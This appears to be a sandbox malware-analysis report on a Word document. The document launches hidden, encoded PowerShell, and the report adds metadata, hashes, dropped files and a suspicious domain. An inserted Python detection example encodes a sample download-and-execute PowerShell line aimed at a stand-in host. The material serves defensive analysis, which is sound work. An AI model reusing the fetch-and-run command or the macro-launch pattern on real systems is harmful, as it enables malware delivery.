File name: | 4236042697f72d0a788466203d7734fdb493cddb8c6de52f04fd25d917f1e5c8 |
Full analysis: | https://app.any.run/tasks/a7ff2bb5-e523-435c-bc71-20530cd28556 |
Verdict: | Malicious activity |
Analysis date: | June 19, 2019, 10:40:31 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1251, Title: 55796Edaxahyjar24990, Subject: 67164Edaxahyj91503, Author: 6014Ocazhulifuf16662, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Tue May 29 15:17:00 2018, Last Saved Time/Date: Tue May 29 15:17:00 2018, Number of Pages: 1, Number of Words: 1, Number of Characters: 9, Security: 0 |
MD5: | C22E326D81FEC1E57781E9F483E1A2A6 |
SHA1: | 169373945F7A5A365C2D0D39D4DAF9A8983F936C |
SHA256: | 4236042697F72D0A788466203D7734FDB493CDDB8C6DE52F04FD25D917F1E5C8 |
SSDEEP: | 1536:abUDKIqZ4YY9NFSshlnAp/9Mx/vCPmakCY/+gRg4wr1FABA/7UsH:S+KDYD8szu9Mx/QJEvwr1SBA/7 |
Extension | Description |
---|---|
.doc | Microsoft Word document (54.2) |
.doc | Microsoft Word document (old ver.) (32.2) |
Property | Value |
---|---|
CompObjUserType: | Документ Microsoft Word 97-2003 (Cyrillic "Документ" = "Document"; the eight characters were mojibake of a code page 1251 string, and the 32-byte CompObjUserTypeLen is these 31 characters plus NUL) |
CompObjUserTypeLen: | 32 |
Category: | 48881Edaxahyj71457 |
HeadingPairs: | - |
TitleOfParts: | - |
HyperlinksChanged: | No |
SharedDoc: | No |
LinksUpToDate: | No |
ScaleCrop: | No |
AppVersion: | 14 |
CharCountWithSpaces: | 9 |
Paragraphs: | 1 |
Lines: | 1 |
Company: | 47842Edaxahyjarad84268 |
CodePage: | Windows Cyrillic |
Security: | None |
Characters: | 9 |
Words: | 1 |
Pages: | 1 |
ModifyDate: | 2018:05:29 14:17:00 |
CreateDate: | 2018:05:29 14:17:00 |
TotalEditTime: | - |
Software: | Microsoft Office Word |
RevisionNumber: | 1 |
LastModifiedBy: | - |
Template: | Normal.dotm |
Comments: | - |
Keywords: | - |
Author: | 6014Ocazhulifuf16662 |
Subject: | 67164Edaxahyj91503 |
Title: | 55796Edaxahyjar24990 |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3376 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\4236042697f72d0a788466203d7734fdb493cddb8c6de52f04fd25d917f1e5c8.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
4048 | PowersHeLL -WinDowsTyle hidden -e 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 | C:\Windows\System32\WindowsPowerShell\v1.0\PowersHeLL.exe | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
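Two checks a responder would script from the property table and the process tree above, as an added example that is not the page's or ANY.RUN's code: a heuristic for the machine-generated document properties (Title "55796Edaxahyjar24990", Author "6014Ocazhulifuf16662", Company "47842Edaxahyjarad84268") and a detector for WINWORD.EXE spawning powershell.exe with a hidden window and an encoded command, tolerant of the case-mangled "PowersHeLL" / "-WinDowsTyle" spellings. The event records, their field names, and the base64 payload are constructed (the real -e argument is not reproduced on this page); the parameter-prefix matching mirrors how powershell.exe accepts abbreviated switches such as -e and -w, and the exact alias set is this example's assumption.

```python
"""Triage helpers for the report above (added example, not ANY.RUN's own code).

  1. Document properties that look machine-generated: <digits><letters><digits>.
  2. Office application -> powershell.exe with -WindowStyle hidden and
     -EncodedCommand, normalising the case-mangled spellings in the process tree.
The event dictionaries and the encoded payload are constructed samples.
"""
import base64
import re

# --- 1. metadata heuristic --------------------------------------------------
GENERATED_NAME = re.compile(r"^\d{3,}[A-Za-z]{4,}\d{3,}$")

def generated_properties(props: dict) -> list:
    """Names of properties whose values follow the digits/letters/digits pattern
    seen in this sample's Title, Subject, Author, Category and Company."""
    return [k for k, v in props.items() if isinstance(v, str) and GENERATED_NAME.match(v)]

# --- 2. process-tree heuristic ---------------------------------------------
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe"}
URL_RE = re.compile(r"https?://[^\s'\"()]+")

def _param(token: str, full: str, aliases=()) -> bool:
    """powershell.exe matches parameters case-insensitively by unambiguous
    prefix (-WindowStyle, -Win, -w; -EncodedCommand, -enc, -ec, -e), which is
    why '-WinDowsTyle' above is accepted. The alias tuples are an assumption."""
    t = token.lstrip("-/").lower()
    return bool(t) and (t in aliases or (len(t) >= 2 and full.startswith(t)))

def _tokens(cmdline: str) -> list:
    # keep quoted arguments together, then drop the quotes
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmdline)]

def decode_encoded_command(b64: str) -> str:
    """-EncodedCommand carries the script as base64 of UTF-16LE text."""
    return base64.b64decode(b64).decode("utf-16-le")

def analyse_event(event: dict) -> dict:
    """event: Sysmon/EDR-style process-creation record with keys
    'image', 'parent_image', 'cmdline' (field names are this example's)."""
    image = event["image"].rsplit("\\", 1)[-1].lower()      # PowersHeLL.exe -> powershell.exe
    parent = event["parent_image"].rsplit("\\", 1)[-1].lower()
    toks = _tokens(event["cmdline"])
    indicators, script = [], None
    if image in POWERSHELL_IMAGES and parent in OFFICE_PARENTS:
        indicators.append("office-spawned-powershell")
    for i, tok in enumerate(toks):
        nxt = toks[i + 1] if i + 1 < len(toks) else ""
        if _param(tok, "windowstyle", ("w",)) and nxt.lower() == "hidden":
            indicators.append("hidden-window")
        elif _param(tok, "encodedcommand", ("e", "ec")) and nxt:
            try:
                script = decode_encoded_command(nxt)
                indicators.append("encoded-command")
            except (ValueError, UnicodeDecodeError):
                indicators.append("encoded-command-undecodable")
    urls = URL_RE.findall(script) if script else []
    if urls:
        indicators.append("download-url")
    return {
        "indicators": indicators,
        "decoded": script,
        "urls": urls,
        # the combination observed in this report, not any single flag
        "suspicious": "office-spawned-powershell" in indicators
                      and any(i.startswith("encoded-command") for i in indicators),
    }

# constructed payload standing in for the removed -e argument (NOT the real one)
SAMPLE_SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/p')"
SAMPLE_B64 = base64.b64encode(SAMPLE_SCRIPT.encode("utf-16-le")).decode()

SAMPLE_EVENTS = [
    {   # mirrors PID 4048 above, with the encoded argument replaced
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\PowersHeLL.exe",
        "parent_image": r"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE",
        "cmdline": "PowersHeLL -WinDowsTyle hidden -e " + SAMPLE_B64,
    },
    {   # benign admin use: not Office-spawned, no encoded command
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "parent_image": r"C:\Windows\explorer.exe",
        "cmdline": r'powershell.exe -NoProfile -ExecutionPolicy Bypass -File "C:\ops\inv.ps1"',
    },
]

SAMPLE_PROPS = {"Title": "55796Edaxahyjar24990", "Author": "6014Ocazhulifuf16662",
                "Template": "Normal.dotm", "Company": "47842Edaxahyjarad84268"}

if __name__ == "__main__":
    print("generated-looking properties:", generated_properties(SAMPLE_PROPS))
    for ev in SAMPLE_EVENTS:
        print(analyse_event(ev))
```

The verdict is deliberately tied to the pair "Office parent plus encoded command"; a hidden window or an encoded command on its own is common in legitimate automation, whereas WINWORD.EXE launching them is the macro pattern this report captures. Image and parent names are lower-cased before comparison because Windows resolves "PowersHeLL.exe" to the same binary as "powershell.exe", so an exact-match rule on the spelling in the command line would miss this sample.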
PID | Process | Filename | Type | MD5 | SHA256 |
---|---|---|---|---|---|
3376 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVREDE7.tmp.cvr | — | — | — |
4048 | PowersHeLL.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\76LRIP2PQCJZD2QOO627.temp | — | — | — |
4048 | PowersHeLL.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | 131DC75F6D4142CA9244945A91A71E8D | F17C463C77B5DA9E795770A82E0A7FB1023023F44397F6E080721E9811B2A0C4 |
3376 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$36042697f72d0a788466203d7734fdb493cddb8c6de52f04fd25d917f1e5c8.doc | pgc | D761EEC0E8CC75251B96A648060EA868 | 9287D097B6210AF0ECE2D4A392597151B8614AF75708B1C07AD2987CCAE08906 |
4048 | PowersHeLL.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF11f980.TMP | binary | 131DC75F6D4142CA9244945A91A71E8D | F17C463C77B5DA9E795770A82E0A7FB1023023F44397F6E080721E9811B2A0C4 |
3376 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | 59B915F43B43901FA79C60151EA8042C | 836805470EEA2E00AAEE4008E313688C272B90045958CE36BDA26A66D9A0F169 |
Domain | IP | Reputation |
---|---|---|
g94q1w8dqw.com | — | suspicious |